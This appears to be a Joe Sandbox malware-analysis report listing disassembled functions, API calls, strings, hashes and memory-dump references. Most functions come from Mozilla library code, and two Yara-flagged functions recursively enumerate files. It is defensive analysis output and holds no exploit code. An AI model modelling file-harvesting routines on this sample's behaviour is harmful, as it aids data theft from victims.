API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
API String ID: 3686969729-1266492768
Opcode ID: 12b683c69dd547d01354cfa7b5cc84e0e8aa91678d01f52128adb0459bcd7913
Instruction ID: c6e83a088edece368df07854dae2cf0511b8c80bcbe8cc1717f30cacc5500ede
Opcode Fuzzy Hash: 12b683c69dd547d01354cfa7b5cc84e0e8aa91678d01f52128adb0459bcd7913
Instruction Fuzzy Hash: B4223370B04380DBDB009F75CD8465AB7B4FF8634EF804A6DE846A7A41E7358869CB5B

Function 6C596C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C596CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C596D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C596D26

Part of subcall function 6C59CA10: malloc.MOZGLUE(?), ref: 6C59CA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C596D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C596D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C596D73
free.MOZGLUE(00000000), ref: 6C596D80
CertGetNameStringW.CRYPT32 ref: 6C596DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C596DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C596DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C596DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C596E10
CryptMsgClose.CRYPT32(00000000), ref: 6C596E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C596E34
CreateFileW.KERNEL32 ref: 6C596EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C596F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C596F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C59709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C597103
free.MOZGLUE(00000000), ref: 6C597153
CloseHandle.KERNEL32(?), ref: 6C597176
__Init_thread_footer.LIBCMT ref: 6C597209
__Init_thread_footer.LIBCMT ref: 6C59723A
__Init_thread_footer.LIBCMT ref: 6C59726B
__Init_thread_footer.LIBCMT ref: 6C59729C
__Init_thread_footer.LIBCMT ref: 6C5972DC
__Init_thread_footer.LIBCMT ref: 6C59730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C5973C2
VerSetConditionMask.NTDLL ref: 6C5973F3
VerSetConditionMask.NTDLL ref: 6C5973FF
VerSetConditionMask.NTDLL ref: 6C597406
VerSetConditionMask.NTDLL ref: 6C59740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C59741A
moz_xmalloc.MOZGLUE(?), ref: 6C59755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C597568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C597585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C597598
free.MOZGLUE(00000000), ref: 6C5975AC

Part of subcall function 6C5BAB89: EnterCriticalSection.KERNEL32(6C60E370,?,?,?,6C5834DE,6C60F6CC,?,?,?,?,?,?,?,6C583284), ref: 6C5BAB94
Part of subcall function 6C5BAB89: LeaveCriticalSection.KERNEL32(6C60E370,?,6C5834DE,6C60F6CC,?,?,?,?,?,?,?,6C583284,?,?,6C5A56F6), ref: 6C5BABD1

Strings

wintrust.dll, xrefs: 6C5972CD
CryptCATAdminReleaseCatalogContext, xrefs: 6C5972C8
SHA256, xrefs: 6C596EC0
(, xrefs: 6C59768A

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: f01ce5cef450dbcbef6d6f45a1b54cc36b744940694b6da4f07430a75444ef2e
Instruction ID: febb0bbd233958c1d4022621faa040b23738a2c49901d990ebcdb81b3d043976
Opcode Fuzzy Hash: f01ce5cef450dbcbef6d6f45a1b54cc36b744940694b6da4f07430a75444ef2e
Instruction Fuzzy Hash: 8452DFB1A003549BEB21DF25CD84BAA77B8FB85748F0045DEE909A7640DB70AE84CF95

Function 6C5C0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C5C0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6C5C0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6C5C0FB7
EnterCriticalSection.KERNEL32(?), ref: 6C5C0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C5C1031
LeaveCriticalSection.KERNEL32(?), ref: 6C5C10D0
EnterCriticalSection.KERNEL32(?), ref: 6C5C117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6C5C1C39
EnterCriticalSection.KERNEL32(6C60E744), ref: 6C5C3391
LeaveCriticalSection.KERNEL32(6C60E744), ref: 6C5C33CD
LeaveCriticalSection.KERNEL32(?), ref: 6C5C3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5C3437

Strings

Compile-time page size does not divide the runtime one., xrefs: 6C5C3946
MALLOC_OPTIONS, xrefs: 6C5C35FE
MOZ_CRASH(), xrefs: 6C5C3950
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C5C37D2
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C5C3793
: (malloc) Unsupported character in malloc options: ', xrefs: 6C5C3A02
MOZ_RELEASE_ASSERT(mNode), xrefs: 6C5C3559, 6C5C382D, 6C5C3848
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C5C37A8
<jemalloc>, xrefs: 6C5C3941, 6C5C39F1
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C5C37BD

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: 742b09b1438d104b10d32906458be460d768f67551b3e91fe5e40577d4d05345
Instruction ID: 4b83d104ad01baf342f2bd3d73094a0093f4ea1338bef246603bab3cf99b4ec2
Opcode Fuzzy Hash: 742b09b1438d104b10d32906458be460d768f67551b3e91fe5e40577d4d05345
Instruction Fuzzy Hash: 74538B72B057018FD304CF69C980616FBE1BF89328F29C66DE8699B791D775E841CB82

Function 6C5E34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E378F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3892
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E38BB
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3902
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3939
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3970
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E39EF
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3A26
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3AE5
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3E85
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3EBA
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E3EE2

Part of subcall function 6C5E6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C5E61DD
Part of subcall function 6C5E6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C5E622C

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E40F9
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E412F
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E4157

Part of subcall function 6C5E6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C5E6250
Part of subcall function 6C5E6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5E6292

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E441B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C5E4448
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C5E484E
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C5E4863
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C5E4878
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C5E4896
free.MOZGLUE ref: 6C5E489F

Strings

, xrefs: 6C5E4CD2

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: floor$free$malloc$memcpy
String ID:
API String ID: 3842999660-3916222277
Opcode ID: 75da9438a9dfe6d4aae6536be414b15f4c9042251ad2c6ea95a6fc50b9b52fa4
Instruction ID: b290886fa0a5343ae36b53059497a44e45d38490fd6034f86a17eea547787daa
Opcode Fuzzy Hash: 75da9438a9dfe6d4aae6536be414b15f4c9042251ad2c6ea95a6fc50b9b52fa4
Instruction Fuzzy Hash: 5BF25970908B80CFC725CF28C48469AFBF1BFC9348F118A5ED99997751DB719886CB86

Function 6C5964C0 Relevance: 52.9, APIs: 24, Strings: 6, Instructions: 406memoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C5964DF
GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C5964F2
GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C596505
GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C596518
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C59652B
memcpy.VCRUNTIME140(?,?,?), ref: 6C59671C
GetCurrentProcess.KERNEL32 ref: 6C596724
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C59672F
GetCurrentProcess.KERNEL32 ref: 6C596759
FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C596764
VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C596A80
GetSystemInfo.KERNEL32(?), ref: 6C596ABE
__Init_thread_footer.LIBCMT ref: 6C596AD3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C596AE8
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C596AF7

Strings

_etoured.dll, xrefs: 6C5964ED
nvd3d9wrap.dll, xrefs: 6C596500
user32.dll, xrefs: 6C596526
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows, xrefs: 6C596798
detoured.dll, xrefs: 6C5964DA
nvdxgiwrap.dll, xrefs: 6C596513

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
API String ID: 487479824-2878602165
Opcode ID: 998958e9ca2ee7d6ebddc1129a8ff5b37a5b51b3e07dfd1ce8a0849e6a73f430
Instruction ID: 36035b388fe9b33ade556030554c211009982d2d422021b30eb3106ec3ad31e4
Opcode Fuzzy Hash: 998958e9ca2ee7d6ebddc1129a8ff5b37a5b51b3e07dfd1ce8a0849e6a73f430
Instruction Fuzzy Hash: E7F1E170A01359DFDB60CF25CD88B9AB7B4EF46308F1442D9D819A3681DB31AE89CF95

Function 003D38B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 003D38CC
FindFirstFileA.KERNEL32(?,?), ref: 003D38E3
lstrcat.KERNEL32(?,?), ref: 003D3935
StrCmpCA.SHLWAPI(?,003E0F70), ref: 003D3947
StrCmpCA.SHLWAPI(?,003E0F74), ref: 003D395D
FindNextFileA.KERNEL32(000000FF,?), ref: 003D3C67
FindClose.KERNEL32(000000FF), ref: 003D3C7C

Strings

%s\%s, xrefs: 003D397A
%s%s, xrefs: 003D3AAD
%s\%s, xrefs: 003D3A6F
%s\%s\%s, xrefs: 003D3A4A
%s\*, xrefs: 003D38C0

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
API String ID: 1125553467-2524465048
Opcode ID: 36deadbaafe562db777ed8e42e06092525dff05b5d9963a51ec1f6fd6d6436df
Instruction ID: 2f84c167f80102084f379e7b8d61827c2090973e1ac7703765da304b45781bbb
Opcode Fuzzy Hash: 36deadbaafe562db777ed8e42e06092525dff05b5d9963a51ec1f6fd6d6436df
Instruction Fuzzy Hash: 8BA160B2A503189BDB25DFA4DC85FEE7379FB48300F044589E50D96241EB719B85CF62

Function 6C5EC4A0 Relevance: 35.2, APIs: 26, Instructions: 2665COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C5EC5F9
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C5EC6FB
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C5EC74D
memset.VCRUNTIME140(?,00000000,00004008), ref: 6C5EC7DE
memset.VCRUNTIME140(?,00000000,00004014), ref: 6C5EC9D5
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C5ECC76
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C5ECD7A
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C5EDB40
memcpy.VCRUNTIME140(?,?,?), ref: 6C5EDB62
memcpy.VCRUNTIME140(?,?,?), ref: 6C5EDB99
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C5EDD8B
memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C5EDE95
memcpy.VCRUNTIME140(?,?,?), ref: 6C5EE360
memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C5EE432
memcpy.VCRUNTIME140(?,?,?), ref: 6C5EE472

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction ID: 6a1cf3eeabc3a93842f303e240b42f1ab147810d6b08c5020f05788fcac5d0c5
Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
Instruction Fuzzy Hash: A233AF71E0021ACFCB14CFA8C8806EDBBF2FF89310F294669D955AB755E731A945CB90

Function 6C5AED10 Relevance: 32.4, APIs: 16, Strings: 2, Instructions: 5407COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C5AEE7A
memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C5AEFB5
memcpy.VCRUNTIME140(?,?,?,?), ref: 6C5B1695
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5B16B4
memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C5B1770
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C5B1A3E

Strings

~qXl, xrefs: 6C5AED13
~qXl, xrefs: 6C5AED10

Memory Dump Source

Source File: 00000000.00000002.1938387558.000000006C581000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C580000, based on PE: true

Associated: 00000000.00000002.1938367376.000000006C580000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938449117.000000006C5FD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938473928.000000006C60E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1938494510.000000006C612000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c580000_file.jbxd

Similarity

API ID: memset$freemallocmemcpy
String ID: ~qXl$~qXl
API String ID: 3693777188-225071925
Opcode ID: 23e2b76d4947ac59122085f343f549503359aaf9ce3ce877d3bb4bc38b19b10d
Instruction ID: db0e089870dbedf68aa735f52b6f31ad88d32c26529f274ba04e397bb702b865
Opcode Fuzzy Hash: 23e2b76d4947ac59122085f343f549503359aaf9ce3ce877d3bb4bc38b19b10d
Instruction Fuzzy Hash: C1B30A71E04219CFCB14CFA9C990A9DBBB2BF89304F1582A9D459BB745D730AD86CF90

Function 003D4570 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 003D4580
RtlAllocateHeap.NTDLL(00000000), ref: 003D4587
wsprintfA.USER32 ref: 003D45A6
FindFirstFileA.KERNEL32(?,?), ref: 003D45BD
StrCmpCA.SHLWAPI(?,003E0FC4), ref: 003D45EB
StrCmpCA.SHLWAPI(?,003E0FC8), ref: 003D4601
FindNextFileA.KERNEL32(000000FF,?), ref: 003D468B
FindClose.KERNEL32(000000FF), ref: 003D46A0
lstrcat.KERNEL32(?,00E6F588), ref: 003D46C5
lstrcat.KERNEL32(?,00E6EB38), ref: 003D46D8
lstrlen.KERNEL32(?), ref: 003D46E5
lstrlen.KERNEL32(?), ref: 003D46F6

Strings

8, xrefs: 003D46CB
%s\%s, xrefs: 003D461B
%s\*, xrefs: 003D459A

Memory Dump Source

Source File: 00000000.00000002.1915742704.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1915678760.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1915742704.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000007AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.0000000000881000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008A4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916260101.00000000008BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916706869.00000000008BB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916934823.0000000000A53000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1916951836.0000000000A54000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*$8
API String ID: 671575355-2210567263
Opcode ID: d589b73b9fef8654e67c06144e0f0874d76a4063655b9808004105af3b2dfda5
